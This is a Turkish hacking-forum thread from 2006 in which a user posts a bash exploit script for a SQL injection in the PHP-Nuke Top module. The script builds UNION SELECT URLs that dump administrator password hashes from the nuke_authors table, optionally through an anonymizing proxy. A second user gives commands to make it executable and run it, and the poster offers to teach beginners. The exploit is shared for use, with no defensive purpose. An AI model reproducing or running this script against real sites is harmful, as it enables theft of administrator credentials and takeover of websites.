Tahribat.com Forumları
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Phpnuke 6.X Ve 7.6Top Module Remote SQL Injection

Yazar a4tech (1) aga_4455 (1) Fcuk (1) istanbullu (1) servey_karen (1) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Yapay Zeka     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Phpnuke 6.X Ve 7.6Top Module Remote SQL Injection

1. 14/Haz/06 21:28 Kısayol Şikayet Özel Mesaj
   istanbullu
   
   

   Kayıt Tarihi: 14/Haziran/2006
   

   saldırgan çalştırdığı scriple uzakdan sql e bağlantı sağlanabiliyor ve admin exploit test edildi phpNuke bu sürümleri
   
   expolit:
   
   
   #/bin/bash
   
   # This is just basic-ly modules.php?name=Top&querylang=union%20select%200, pwd,0,0%20from%20nuke _authors%20where%20radminsuper=1
   # works thou /str0ke
   
   #
   # # by Fabrizi Andrea 2005
   # andrea.fabrizi [at] gmail.com
   #
   # Work with the PHPNuke latest version!
   #
   
   URL=$1;
   PATH="$2/";
   ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";
   
   echo -e "\n PHPNuke Top Module Remote SQL Injection"
   echo -e " by Fabrizi Andrea 2005"
   
   if [ "$URL" = "" ]; then
   echo -e "\n USAGE: $0 [url] [NukePath]"
   echo -e " Example: $0 www.site.net phpNuke\n"
   exit
   fi;
   
   if [ $PATH = "/" ]; then PATH=""; fi;
   #anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20wher e%20radminsuper=1";
   anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20sele ct%200,pwd,0,0%20from%20nuke _authors%20where%20radminsuper=1"; #changed line /str0ke
   
   #query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20wher e%20radminsuper=1";
   query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20sele ct%200,pwd,0,0%20from%20nuke _authors%20where%20radminsuper=1"; #changed line /str0ke
   
   echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
   echo -e " - Direct Query URL: " $query_url "\n";
   echo -e " - If this version of PHPNuke is vurnerable you can see the Admin’s Passwords Hashes at the end of ’Most voted polls’ List!\n"
   
   bilmeyen arkadaşlarım isterse açıklama yaparım, gerekirse videoda hazırlarız :)

   ---

   bu hayatin taaaaa a.q.
   Alıntı yap
2. 14/Haz/06 21:29 Kısayol Şikayet Özel Mesaj
   Fcuk
   
   

   Kayıt Tarihi: 09/Eylül/2005
   

   istanbullu senin nickin altındaki çömlüğü silelim ya söyleyelim de silinsin sen daha ilk günden foruma abandın :) yalnız ilk gün abanıp bırakma ;)

   ---

   Hoop.
   Alıntı yap
3. 14/Haz/06 21:31 Kısayol Şikayet Özel Mesaj
   a4tech
   
   

   Kayıt Tarihi: 21/Temmuz/2005
   

   Tabi bunu kullanmak için linux kullanmanız gerekiyor :) Kullananlar varsa bir komut calıstırmaları gerekiyor exploit'i kullanmadan once. Exploiti kaydettikten sonra;
   
   $ chmod +x exploitadi
   $ ./exploit
   
   yaparak calıstırabilirsiniz.
   Alıntı yap
4. 14/Haz/06 21:33 Kısayol Şikayet Özel Mesaj
   istanbullu
   
   

   Kayıt Tarihi: 14/Haziran/2006
   

   eyw.aga bildiklerimizi ve gördüklerimizi paylaşıyoruz (çoğu alıntı gerçi) maksat daha tecrübesiz arkadaşlara yardımcı olmak. Hem merak etme nasıl başladıysak öyle devam ederiz ;)

   ---

   bu hayatin taaaaa a.q.
   Alıntı yap
5. 14/Haz/06 21:36 Kısayol Şikayet Özel Mesaj
   servey_karen
   
   

   Kayıt Tarihi: 02/Ağustos/2005
   

   tşk iyi güzel paylaşım alıntı olduğu biliniyordu zaten

   ---

   servey
   Alıntı yap
6. 16/Haz/06 15:57 Kısayol Şikayet Özel Mesaj
   aga_4455
   
   

   Kayıt Tarihi: 21/Eylül/2005
   

   tşk ler saol ya ben bi site kuracam bana yardım eden yarmı php nuke ile ilgili

   ---

   imza yok mühür bassak..
   Alıntı yap

Cevapla